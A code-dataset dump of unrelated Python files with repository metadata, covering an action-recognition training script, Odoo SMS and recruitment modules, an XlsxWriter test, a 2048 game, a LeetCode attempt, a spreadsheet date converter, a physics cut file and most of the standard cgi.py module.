def get_train_set(dataset_path: str, image_size: ImageSize):
num_joints = 15
left_indexes: List[int] = [3, 4, 5, 9, 10, 11]
right_indexes: List[int] = [6, 7, 8, 12, 13, 14]
datasets: List[EhpiDataset] = [
# Set 1
EhpiDataset(os.path.join(dataset_path, "ofp_record_2019_03_11_HSRT_30FPS"),
transform=transforms.Compose([
RemoveJointsOutsideImgEhpi(image_size),
ScaleEhpi(image_size),
TranslateEhpi(image_size),
FlipEhpi(left_indexes=left_indexes, right_indexes=right_indexes),
NormalizeEhpi(image_size)
]), num_joints=num_joints, dataset_part=DatasetPart.TEST),
# Set 2
EhpiDataset(os.path.join(dataset_path, "2019_03_13_Freilichtmuseum_30FPS"),
transform=transforms.Compose([
RemoveJointsOutsideImgEhpi(image_size),
ScaleEhpi(image_size),
TranslateEhpi(image_size),
FlipEhpi(left_indexes=left_indexes, right_indexes=right_indexes),
NormalizeEhpi(image_size)
]), num_joints=num_joints, dataset_part=DatasetPart.TRAIN),
]
for dataset in datasets:
dataset.print_label_statistics()
return ConcatDataset(datasets)
if __name__ == '__main__':
batch_size = 128
seed = 0
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# Train set
train_set = get_train_set(ehpi_dataset_path, image_size=ImageSize(1280, 720))
sampler = ImbalancedDatasetSampler(train_set, dataset_type=EhpiDataset)
train_loader = DataLoader(train_set, batch_size=batch_size, sampler=sampler, num_workers=1)
# config
train_config = TrainingConfigBase("ehpi_model", "models")
train_config.weight_decay = 0
train_config.num_epochs = 140
trainer = TrainerEhpi()
trainer.train(train_loader, train_config, model=ShuffleNetV2(3))
| [
"[email protected]"
] | |
49df46b47998c18b9a1e1cd63e336461b0b668e5 | 5390d79dad71ad0d9ff9d0777435dcaf4aad16b3 | /chapter_05/toppings5.py | bb3053276c058e6ce16e156ef1659461aab3c552 | [] | no_license | JasperMi/python_learning | 19770d79cce900d968cec76dac11e45a3df9c34c | 8111d0d12e4608484864dddb597522c6c60b54e8 | refs/heads/master | 2020-11-26T08:57:02.983869 | 2020-03-11T10:14:55 | 2020-03-11T10:14:55 | 218,935,548 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | requested_toppings = []
if requested_toppings:
for requested_topping in requested_toppings:
print("Adding " + requested_topping + ".")
print("\nFinished making your pizza!")
else:
print("Are you sure you want a plain pizza?")
| [
"[email protected]"
] | |
193cb91ce7cabc2daeb6898364f78bd9d496cf4b | 9fc6604ae98e1ae91c490e8201364fdee1b4222a | /eg_delivery_return_disclaimer_msg/wizards/msg_by_unifonic.py | 1e5e3eb6e45160c46c0dadf6f1a4942c11dc796a | [] | no_license | nabiforks/baytonia | b65e6a7e1c7f52a7243e82f5fbcc62ae4cbe93c4 | 58cb304d105bb7332f0a6ab685015f070988ba56 | refs/heads/main | 2023-03-23T21:02:57.862331 | 2021-01-04T03:40:58 | 2021-01-04T03:40:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | py | from odoo import models, fields, api
from odoo.exceptions import Warning
class MsgByUnifonic(models.TransientModel):
_name = "msg.by.unifonic"
number = fields.Char(string="Number")
message = fields.Text(string="Message")
@api.model
def default_get(self, fields_list):
res = super(MsgByUnifonic, self).default_get(fields_list)
picking_id = self.env["stock.picking"].browse(self._context.get("active_id"))
sms_instance_id = self.env["sms.instance"].search([("provider", "=", "unifonic_sms")], limit=1)
if picking_id and sms_instance_id:
message = sms_instance_id.return_disclaimer_msg
dst_number = picking_id.partner_id.phone or picking_id.partner_id.mobile or None
if message:
url = "https://oddo.baytonia.com/delivery_return/confirm/{}".format(picking_id.id)
message = message.replace("{{order_number}}", picking_id.name)
message = message.replace("{{customer_name}}", picking_id.partner_id.name)
message = message.replace("{{total_amount}}", str(picking_id.total_amount))
message = message.replace("{{return_approve_url}}", url)
res["number"] = dst_number
res["message"] = message
return res
@api.multi
def send_msg_customer_by_unifonic(self):
if self.message and self.number:
self.env["post.sms.wizard"].send_sms(body=self.message, dst_number=self.number)
else:
raise Warning("Number and Message are required")
| [
"[email protected]"
] | |
7f733621867abbd79a0a8d2784f7d57814b625e5 | ebd24e400986c57b4bb1b9578ebd8807a6db62e8 | /InstaGrade-FormBuilder/xlsxwriter/test/comparison/test_chart_errorbars05.py | 002e0d8055c1d99983bc226195274cbf4b92c183 | [] | no_license | nate-parrott/ig | 6abed952bf32119a536a524422037ede9b431926 | 6e0b6ac0fb4b59846680567150ce69a620e7f15d | refs/heads/master | 2021-01-12T10:15:15.825004 | 2016-12-13T21:23:17 | 2016-12-13T21:23:17 | 76,399,529 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,706 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2014, John McNamara, [email protected]
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'chart_errorbars05.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {}
def test_create_file(self):
"""Test the creation of an XlsxWriter file with error bars."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'bar'})
chart.axis_ids = [49016832, 49019136]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({
'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$B$1:$B$5',
'x_error_bars': {'type': 'standard_error'},
})
chart.add_series({
'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$C$1:$C$5',
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
| [
"[email protected]"
] | |
5ad138fa284a69c9c985ba8a2084ea57d9d8d176 | 0071aad01ab5e91b7d32567470bd729c23bac656 | /g2048.py | d75f388736b07dd7f87d31f67252e7ab02cbf060 | [] | no_license | Hakuyume/2048-rl | 19c29e24492bd1efaddbbe0dad28474752b2d97f | ff0593582b293bcf1c21bd2e26701da6d24c6647 | refs/heads/master | 2021-01-22T18:33:36.057004 | 2017-08-26T06:47:37 | 2017-08-26T06:47:37 | 100,769,933 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,058 | py | import numpy as np
import random
class G2048(object):
def __init__(self, size=4):
self.size = size
self.board = np.empty((size, size), dtype=np.uint8)
def reset(self):
self.score = 0
self.board[:] = 0
for _ in range(2):
self._add()
@property
def movability(self):
m = np.zeros(4, dtype=bool)
for d in range(4):
board = np.rot90(self.board, d)
if np.logical_and(board[:, :-1] == 0, board[:, 1:] > 0).any():
m[d] = True
elif np.logical_and(
board[:, :-1] > 0, board[:, :-1] == board[:, 1:]).any():
m[d] = True
return m
@property
def is_finished(self):
return not self.movability.any()
def _add(self):
blank = tuple(zip(*np.where(self.board == 0)))
if len(blank) > 0:
u, v = random.choice(blank)
if random.uniform(0, 1) > 1 / 4:
self.board[u, v] = 1
else:
self.board[u, v] = 2
def move(self, direction):
change = False
for line in np.rot90(self.board, direction):
v, w = 0, 0
new_line = np.zeros_like(line)
while v < self.size:
if line[v] == 0:
v += 1
elif new_line[w] == line[v]:
new_line[w] += 1
self.score += 1 << new_line[w]
change = True
v += 1
w += 1
elif new_line[w] == 0:
new_line[w] = line[v]
change = change or not v == w
v += 1
else:
w += 1
line[:] = new_line
if change:
self._add()
def normalize(self):
self.board[:] = min(
(np.rot90(b, r)
for b in (self.board, self.board.transpose())
for r in range(4)),
key=lambda b: tuple(b.flatten()))
| [
"[email protected]"
] | |
8ee0c7c66379fbead56732ab779d72356e965329 | 925f199438b3af508cf083ce094cb6a5f208fed8 | /src/lt_847.py | ed54216792f6792912f298fe087f8840d98ee563 | [] | no_license | oxhead/CodingYourWay | b1b50236cdfb06669c123fd9202ce3d87304a3bf | e60ba45fe2f2e5e3b3abfecec3db76f5ce1fde59 | refs/heads/master | 2020-08-06T16:45:21.054650 | 2018-06-26T03:53:38 | 2018-06-26T03:53:38 | 30,577,969 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,323 | py | """
https://leetcode.com/contest/weekly-contest-87/problems/shortest-path-visiting-all-nodes/
"""
"""
An undirected, connected graph of N nodes (labeled 0, 1, 2, ..., N-1) is given as graph.
graph.length = N, and j != i is in the list graph[i] exactly once, if and only if nodes i and j are connected.
Return the length of the shortest path that visits every node. You may start and stop at any node, you may revisit nodes multiple times, and you may reuse edges.
Example 1:
Input: [[1,2,3],[0],[0],[0]]
Output: 4
Explanation: One possible path is [1,0,2,0,3]
Example 2:
Input: [[1],[0,2,4],[1,3,4],[2],[1,2]]
Output: 4
Explanation: One possible path is [0,1,4,2,3]
Note:
1 <= graph.length <= 12
0 <= graph[i].length < graph.length
"""
class Solution:
def shortestPathLength(self, graph):
"""
:type graph: List[List[int]]
:rtype: int
"""
def traverse(queue):
while queue:
current_node, visited, current_length = queue.pop(0)
if len(visited) == len(graph):
return current_length
for neighbor in graph[current_node]:
queue.append((neighbor, visited | set([neighbor]), current_length + 1))
num_edges = float('inf')
endpoints = []
for node_id in range(len(graph)):
node_edges = graph[node_id]
if len(node_edges) < num_edges:
endpoints = [node_id]
num_edges = len(node_edges)
elif len(node_edges) == num_edges:
endpoints.append(node_id)
queue = []
print(endpoints)
for node_id in endpoints[1:2]:
queue.append((node_id, set([node_id]), 0))
return traverse([x for x in queue])
if __name__ == '__main__':
test_cases = [
#([[1,2,3],[0],[0],[0]], 4),
#([[1],[0,2,4],[1,3,4],[2],[1,2]], 4),
#([[1],[0,2],[1,3],[2],[1,5],[4]], 6),
#([[1],[0,2,6],[1,3],[2],[5],[4,6],[1,5,7],[6]], 9),
([[1,4,6,8,9],[0,6],[9],[5],[0],[7,3],[0,1],[9,5],[0],[0,2,7]], 10),
]
for test_case in test_cases:
print('case:', test_case)
output = Solution().shortestPathLength(test_case[0])
print('output:', output)
assert output == test_case[1]
| [
"[email protected]"
] | |
a2d189784bb2a282ec8d7cdf005a0c8612dceb9b | bd08d0532f20b7285b437c9bf620de1bbcd5b9ea | /aalh_iit_buildings_006/populate-iso8601-amerdate.py | 08c1fdd9ca6bdcee638e2292f3d12d555f36c6ff | [
"Unlicense"
] | permissive | johndewees/iitmigration | a9e8a31ba6ceb541ce12c22fd612596cc243dbca | 4dadfbecda719d6e7d60af076a231aedec3c862f | refs/heads/main | 2023-03-14T17:06:58.777683 | 2021-03-27T20:44:58 | 2021-03-27T20:44:58 | 320,086,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,719 | py | from openpyxl import load_workbook
import re
filename = 'aalh_iit_buildings_006.xlsx'
wb = load_workbook(filename)
ws = wb['Metadata Template']
minimumcol = 15
maximumcol = 15
minimumrow = 7
maximumrow = 515
iterationrow = 7
targetcol = 15
isostandardcol = 16
for row in ws.iter_rows(min_row=minimumrow, min_col=minimumcol, max_row=maximumrow, max_col=maximumcol):
print(iterationrow)
print(ws.cell(row=iterationrow, column=targetcol).value)
try:
for cell in row:
ameryear = None
yearraw = ws.cell(row=iterationrow, column=targetcol).value
if yearraw.find(',') != -1:
ameryearre = re.findall('\d\d\d\d', yearraw)
ameryear = ameryearre[0]
print(ameryear)
else:
print('Not an American formatted date (year)')
for cell in row:
amermon = None
monraw = ws.cell(row=iterationrow, column=targetcol).value
if monraw.find(',') != -1:
if monraw.find('Jan') != -1:
amermon = '01'
elif monraw.find('jan') != -1:
amermon = '01'
elif monraw.find('Feb') != -1:
amermon = '02'
elif monraw.find('feb') != -1:
amermon = '02'
elif monraw.find('Mar') != -1:
amermon = '03'
elif monraw.find('mar') != -1:
amermon = '03'
elif monraw.find('Apr') != -1:
amermon = '04'
elif monraw.find('apr') != -1:
amermon = '04'
elif monraw.find('May') != -1:
amermon = '05'
elif monraw.find('may') != -1:
amermon = '05'
elif monraw.find('Jun') != -1:
amermon = '06'
elif monraw.find('jun') != -1:
amermon = '06'
elif monraw.find('Jul') != -1:
amermon = '07'
elif monraw.find('jul') != -1:
amermon = '07'
elif monraw.find('Aug') != -1:
amermon = '08'
elif monraw.find('aug') != -1:
amermon = '08'
elif monraw.find('Sep') != -1:
amermon = '09'
elif monraw.find('sep') != -1:
amermon = '09'
elif monraw.find('Oct') != -1:
amermon = '10'
elif monraw.find('oct') != -1:
amermon = '10'
elif monraw.find('Nov') != -1:
amermon = '11'
elif monraw.find('nov') != -1:
amermon = '11'
elif monraw.find('Dec') != -1:
amermon = '12'
elif monraw.find('dec') != -1:
amermon = '12'
print(amermon)
else:
print('Not an American formatted date (month)')
for cell in row:
amerday = None
dayraw = ws.cell(row=iterationrow, column=targetcol).value
if dayraw.find(',') != -1:
daypart1 = dayraw.split(',')
daypart2 = daypart1[0]
daypart3 = daypart2.split()
daypart4 = daypart3[1]
if daypart4.startswith('1'):
amerday = daypart4
elif daypart4.startswith('2'):
amerday = daypart4
elif daypart4.startswith('3'):
amerday = daypart4
else:
amerday = '0' + daypart4
print(amerday)
else:
print('Not an American formatted date (day)')
for cell in row:
testvar = ws.cell(row=iterationrow, column=targetcol).value
if testvar.find('/') != -1:
testvarlist = testvar.split('/')
testvaryear = testvarlist[2]
testvaryear = testvaryear.strip()
testvarmonth = testvarlist[0]
testvarmonth = testvarmonth.strip()
testvarmonth = int(testvarmonth)
if testvarmonth < 10:
testvarmonth = str(testvarmonth)
testvarmonth = '0' + testvarmonth
else:
testvarmonth = str(testvarmonth)
testvarday = testvarlist[1]
testvarday = testvarday.strip()
testvarday = int(testvarday)
if testvarday < 10:
testvarday = str(testvarday)
testvarday = '0' + testvarday
else:
testvarday = str(testvarday)
isodate = testvaryear + '-' + testvarmonth + '-' + testvarday
ws.cell(row=iterationrow, column=targetcol).value = isodate
#print(isodate)
else:
print ('Not a date formatted with a slash')
for cell in row:
if ameryear == None:
print('Not an American formatted date at all')
else:
amerdatetrans = ameryear + '-' + amermon + '-' + amerday
ws.cell(row=iterationrow, column=isostandardcol).value = amerdatetrans
print(amerdatetrans)
except:
print('Not an American formatted date at all')
iterationrow = iterationrow + 1
wb.save('aalh_iit_buildings_006.xlsx') | [
"[email protected]"
] | |
0c2f558ec0494841857978e64f4fd0e8c8937538 | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/hr_recruitment/__init__.py | 2283b78b5f3c81ef2cc3a1d49ecbbb3c7b0b0f21 | [] | no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | # -*- encoding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from . import models
| [
"[email protected]"
] | |
5d46d3160485153a72aeaa43b0d98d716859314c | 5cdd13489c995d825985f8e76fb9641d83675972 | /PlotConfiguration/ISR/2016/fake_estimation/muon/LLSS/cuts.py | 313c13d35f546643f1eed5f28fcb69008150737b | [] | no_license | CMSSNU/MultiUniv | d506cea55b1f57e0694309e04b9584434c859917 | cb72ac8cba215598a0f09a46725123e071f9137f | refs/heads/master | 2020-04-20T06:23:13.425043 | 2020-03-25T08:11:31 | 2020-03-25T08:11:31 | 168,682,069 | 0 | 4 | null | 2020-02-13T10:14:48 | 2019-02-01T10:35:47 | Python | UTF-8 | Python | false | false | 509 | py | from CommonPyTools.python.CommonTools import *
SKFlat_WD = os.getenv('SKFlat_WD')
sys.path.insert(0,SKFlat_WD+'/CommonTools/include')
from Definitions import *
supercut = '1==1'
# for fake estimation
# LL same sign
cuts['detector_level'] = 'is_dimu_tri_passed == 1 && evt_tag_dimuon_rec_Fake == 1 && evt_tag_dielectron_rec_Fake == 0 && evt_tag_analysisevnt_sel_rec_Fake == 1 && dilep_pt_rec_Fake < 100. && dilep_mass_rec_Fake > 40 && evt_tag_oppositecharge_sel_rec_Fake == 0 && evt_tag_LL_rec_Fake == 1 '
| [
"[email protected]"
] | |
f9c2f40f505b378f8301758253f7362e714120e9 | 4ff5ca8f95e6014fa76323a69f3fbcb91ae8db1f | /usr/lib/python3.8/cgi.py | e41e56e0987fdb28510766b99564fb42e1ee50f8 | [
"Python-2.0"
] | permissive | Nasera5222/git-sdk-32 | ad1ccd631958d1cdbc6f6c9d06793342d5c566ce | bcff70f916ec1f028f79036d5b913a7279fea0e5 | refs/heads/main | 2023-06-01T09:05:05.990441 | 2021-06-20T03:07:00 | 2021-06-20T03:07:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,548 | py | #!/usr/bin/python
# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is
# intentionally NOT "/usr/bin/env python". On many systems
# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI
# scripts, and /usr/local/bin is the default directory where Python is
# installed, so /usr/bin/env would be unable to find python. Granted,
# binary installations by Linux vendors often install Python in
# /usr/bin. So let those vendors patch cgi.py to match their choice
# of installation.
"""Support module for CGI (Common Gateway Interface) scripts.
This module defines a number of utilities for use by CGI scripts
written in Python.
"""
# History
# -------
#
# Michael McLay started this module. Steve Majewski changed the
# interface to SvFormContentDict and FormContentDict. The multipart
# parsing was inspired by code submitted by Andreas Paepcke. Guido van
# Rossum rewrote, reformatted and documented the module and is currently
# responsible for its maintenance.
#
__version__ = "2.6"
# Imports
# =======
from io import StringIO, BytesIO, TextIOWrapper
from collections.abc import Mapping
import sys
import os
import urllib.parse
from email.parser import FeedParser
from email.message import Message
import html
import locale
import tempfile
__all__ = ["MiniFieldStorage", "FieldStorage", "parse", "parse_multipart",
"parse_header", "test", "print_exception", "print_environ",
"print_form", "print_directory", "print_arguments",
"print_environ_usage"]
# Logging support
# ===============
logfile = "" # Filename to log to, if not empty
logfp = None # File object to log to, if not None
def initlog(*allargs):
"""Write a log message, if there is a log file.
Even though this function is called initlog(), you should always
use log(); log is a variable that is set either to initlog
(initially), to dolog (once the log file has been opened), or to
nolog (when logging is disabled).
The first argument is a format string; the remaining arguments (if
any) are arguments to the % operator, so e.g.
log("%s: %s", "a", "b")
will write "a: b" to the log file, followed by a newline.
If the global logfp is not None, it should be a file object to
which log data is written.
If the global logfp is None, the global logfile may be a string
giving a filename to open, in append mode. This file should be
world writable!!! If the file can't be opened, logging is
silently disabled (since there is no safe place where we could
send an error message).
"""
global log, logfile, logfp
if logfile and not logfp:
try:
logfp = open(logfile, "a")
except OSError:
pass
if not logfp:
log = nolog
else:
log = dolog
log(*allargs)
def dolog(fmt, *args):
"""Write a log message to the log file. See initlog() for docs."""
logfp.write(fmt%args + "\n")
def nolog(*allargs):
"""Dummy function, assigned to log when logging is disabled."""
pass
def closelog():
"""Close the log file."""
global log, logfile, logfp
logfile = ''
if logfp:
logfp.close()
logfp = None
log = initlog
log = initlog # The current logging function
# Parsing functions
# =================
# Maximum input we will accept when REQUEST_METHOD is POST
# 0 ==> unlimited input
maxlen = 0
def parse(fp=None, environ=os.environ, keep_blank_values=0, strict_parsing=0):
"""Parse a query in the environment or from a file (default stdin)
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
"""
if fp is None:
fp = sys.stdin
# field keys and values (except for files) are returned as strings
# an encoding is required to decode the bytes read from self.fp
if hasattr(fp,'encoding'):
encoding = fp.encoding
else:
encoding = 'latin-1'
# fp.read() must return bytes
if isinstance(fp, TextIOWrapper):
fp = fp.buffer
if not 'REQUEST_METHOD' in environ:
environ['REQUEST_METHOD'] = 'GET' # For testing stand-alone
if environ['REQUEST_METHOD'] == 'POST':
ctype, pdict = parse_header(environ['CONTENT_TYPE'])
if ctype == 'multipart/form-data':
return parse_multipart(fp, pdict)
elif ctype == 'application/x-www-form-urlencoded':
clength = int(environ['CONTENT_LENGTH'])
if maxlen and clength > maxlen:
raise ValueError('Maximum content length exceeded')
qs = fp.read(clength).decode(encoding)
else:
qs = '' # Unknown content-type
if 'QUERY_STRING' in environ:
if qs: qs = qs + '&'
qs = qs + environ['QUERY_STRING']
elif sys.argv[1:]:
if qs: qs = qs + '&'
qs = qs + sys.argv[1]
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
elif 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
else:
if sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing,
encoding=encoding)
def parse_multipart(fp, pdict, encoding="utf-8", errors="replace"):
"""Parse multipart input.
Arguments:
fp : input file
pdict: dictionary containing other parameters of content-type header
encoding, errors: request encoding and error handler, passed to
FieldStorage
Returns a dictionary just like parse_qs(): keys are the field names, each
value is a list of values for that field. For non-file fields, the value
is a list of strings.
"""
# RFC 2026, Section 5.1 : The "multipart" boundary delimiters are always
# represented as 7bit US-ASCII.
boundary = pdict['boundary'].decode('ascii')
ctype = "multipart/form-data; boundary={}".format(boundary)
headers = Message()
headers.set_type(ctype)
headers['Content-Length'] = pdict['CONTENT-LENGTH']
fs = FieldStorage(fp, headers=headers, encoding=encoding, errors=errors,
environ={'REQUEST_METHOD': 'POST'})
return {k: fs.getlist(k) for k in fs}
def _parseparam(s):
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and (s.count('"', 0, end) - s.count('\\"', 0, end)) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
yield f.strip()
s = s[end:]
def parse_header(line):
"""Parse a Content-type like header.
Return the main content-type and a dictionary of options.
"""
parts = _parseparam(';' + line)
key = parts.__next__()
pdict = {}
for p in parts:
i = p.find('=')
if i >= 0:
name = p[:i].strip().lower()
value = p[i+1:].strip()
if len(value) >= 2 and value[0] == value[-1] == '"':
value = value[1:-1]
value = value.replace('\\\\', '\\').replace('\\"', '"')
pdict[name] = value
return key, pdict
# Classes for field storage
# =========================
class MiniFieldStorage:
"""Like FieldStorage, for use when no file uploads are possible."""
# Dummy attributes
filename = None
list = None
type = None
file = None
type_options = {}
disposition = None
disposition_options = {}
headers = {}
def __init__(self, name, value):
"""Constructor from field name and value."""
self.name = name
self.value = value
# self.file = StringIO(value)
def __repr__(self):
"""Return printable representation."""
return "MiniFieldStorage(%r, %r)" % (self.name, self.value)
class FieldStorage:
"""Store a sequence of fields, reading multipart/form-data.
This class provides naming, typing, files stored on disk, and
more. At the top level, it is accessible like a dictionary, whose
keys are the field names. (Note: None can occur as a field name.)
The items are either a Python list (if there's multiple values) or
another FieldStorage or MiniFieldStorage object. If it's a single
object, it has the following attributes:
name: the field name, if specified; otherwise None
filename: the filename, if specified; otherwise None; this is the
client side filename, *not* the file name on which it is
stored (that's a temporary file you don't deal with)
value: the value as a *string*; for file uploads, this
transparently reads the file every time you request the value
and returns *bytes*
file: the file(-like) object from which you can read the data *as
bytes* ; None if the data is stored a simple string
type: the content-type, or None if not specified
type_options: dictionary of options specified on the content-type
line
disposition: content-disposition, or None if not specified
disposition_options: dictionary of corresponding options
headers: a dictionary(-like) object (sometimes email.message.Message or a
subclass thereof) containing *all* headers
The class is subclassable, mostly for the purpose of overriding
the make_file() method, which is called internally to come up with
a file open for reading and writing. This makes it possible to
override the default choice of storing all files in a temporary
directory and unlinking them as soon as they have been opened.
"""
def __init__(self, fp=None, headers=None, outerboundary=b'',
environ=os.environ, keep_blank_values=0, strict_parsing=0,
limit=None, encoding='utf-8', errors='replace',
max_num_fields=None):
"""Constructor. Read multipart/* until last part.
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
(not used when the request method is GET)
Can be :
1. a TextIOWrapper object
2. an object whose read() and readline() methods return bytes
headers : header dictionary-like object; default:
taken from environ as per CGI spec
outerboundary : terminating multipart boundary
(for internal use only)
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
limit : used internally to read parts of multipart/form-data forms,
to exit from the reading loop when reached. It is the difference
between the form content-length and the number of bytes already
read
encoding, errors : the encoding and error handler used to decode the
binary stream to strings. Must be the same as the charset defined
for the page sending the form (content-type : meta http-equiv or
header)
max_num_fields: int. If set, then __init__ throws a ValueError
if there are more than n fields read by parse_qsl().
"""
method = 'GET'
self.keep_blank_values = keep_blank_values
self.strict_parsing = strict_parsing
self.max_num_fields = max_num_fields
if 'REQUEST_METHOD' in environ:
method = environ['REQUEST_METHOD'].upper()
self.qs_on_post = None
if method == 'GET' or method == 'HEAD':
if 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
elif sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
qs = qs.encode(locale.getpreferredencoding(), 'surrogateescape')
fp = BytesIO(qs)
if headers is None:
headers = {'content-type':
"application/x-www-form-urlencoded"}
if headers is None:
headers = {}
if method == 'POST':
# Set default content-type for POST to what's traditional
headers['content-type'] = "application/x-www-form-urlencoded"
if 'CONTENT_TYPE' in environ:
headers['content-type'] = environ['CONTENT_TYPE']
if 'QUERY_STRING' in environ:
self.qs_on_post = environ['QUERY_STRING']
if 'CONTENT_LENGTH' in environ:
headers['content-length'] = environ['CONTENT_LENGTH']
else:
if not (isinstance(headers, (Mapping, Message))):
raise TypeError("headers must be mapping or an instance of "
"email.message.Message")
self.headers = headers
if fp is None:
self.fp = sys.stdin.buffer
# self.fp.read() must return bytes
elif isinstance(fp, TextIOWrapper):
self.fp = fp.buffer
else:
if not (hasattr(fp, 'read') and hasattr(fp, 'readline')):
raise TypeError("fp must be file pointer")
self.fp = fp
self.encoding = encoding
self.errors = errors
if not isinstance(outerboundary, bytes):
raise TypeError('outerboundary must be bytes, not %s'
% type(outerboundary).__name__)
self.outerboundary = outerboundary
self.bytes_read = 0
self.limit = limit
# Process content-disposition header
cdisp, pdict = "", {}
if 'content-disposition' in self.headers:
cdisp, pdict = parse_header(self.headers['content-disposition'])
self.disposition = cdisp
self.disposition_options = pdict
self.name = None
if 'name' in pdict:
self.name = pdict['name']
self.filename = None
if 'filename' in pdict:
self.filename = pdict['filename']
self._binary_file = self.filename is not None
# Process content-type header
#
# Honor any existing content-type header. But if there is no
# content-type header, use some sensible defaults. Assume
# outerboundary is "" at the outer level, but something non-false
# inside a multi-part. The default for an inner part is text/plain,
# but for an outer part it should be urlencoded. This should catch
# bogus clients which erroneously forget to include a content-type
# header.
#
# See below for what we do if there does exist a content-type header,
# but it happens to be something we don't understand.
if 'content-type' in self.headers:
ctype, pdict = parse_header(self.headers['content-type'])
elif self.outerboundary or method != 'POST':
ctype, pdict = "text/plain", {}
else:
ctype, pdict = 'application/x-www-form-urlencoded', {}
self.type = ctype
self.type_options = pdict
if 'boundary' in pdict:
self.innerboundary = pdict['boundary'].encode(self.encoding,
self.errors)
else:
self.innerboundary = b""
clen = -1
if 'content-length' in self.headers:
try:
clen = int(self.headers['content-length'])
except ValueError:
pass
if maxlen and clen > maxlen:
raise ValueError('Maximum content length exceeded')
self.length = clen
if self.limit is None and clen >= 0:
self.limit = clen
self.list = self.file = None
self.done = 0
if ctype == 'application/x-www-form-urlencoded':
self.read_urlencoded()
elif ctype[:10] == 'multipart/':
self.read_multi(environ, keep_blank_values, strict_parsing)
else:
self.read_single()
def __del__(self):
try:
self.file.close()
except AttributeError:
pass
def __enter__(self):
return self
def __exit__(self, *args):
self.file.close()
def __repr__(self):
"""Return a printable representation."""
return "FieldStorage(%r, %r, %r)" % (
self.name, self.filename, self.value)
def __iter__(self):
return iter(self.keys())
def __getattr__(self, name):
if name != 'value':
raise AttributeError(name)
if self.file:
self.file.seek(0)
value = self.file.read()
self.file.seek(0)
elif self.list is not None:
value = self.list
else:
value = None
return value
def __getitem__(self, key):
"""Dictionary style indexing."""
if self.list is None:
raise TypeError("not indexable")
found = []
for item in self.list:
if item.name == key: found.append(item)
if not found:
raise KeyError(key)
if len(found) == 1:
return found[0]
else:
return found
def getvalue(self, key, default=None):
"""Dictionary style get() method, including 'value' lookup."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return value.value
else:
return default
def getfirst(self, key, default=None):
""" Return the first value received."""
if key in self:
value = self[key]
if isinstance(value, list):
return value[0].value
else:
return value.value
else:
return default
def getlist(self, key):
""" Return list of received values."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return [value.value]
else:
return []
def keys(self):
"""Dictionary style keys() method."""
if self.list is None:
raise TypeError("not indexable")
return list(set(item.name for item in self.list))
def __contains__(self, key):
"""Dictionary style __contains__ method."""
if self.list is None:
raise TypeError("not indexable")
return any(item.name == key for item in self.list)
def __len__(self):
"""Dictionary style len(x) support."""
return len(self.keys())
def __bool__(self):
if self.list is None:
raise TypeError("Cannot be converted to bool.")
return bool(self.list)
def read_urlencoded(self):
"""Internal: read data in query string format."""
qs = self.fp.read(self.length)
if not isinstance(qs, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(qs).__name__))
qs = qs.decode(self.encoding, self.errors)
if self.qs_on_post:
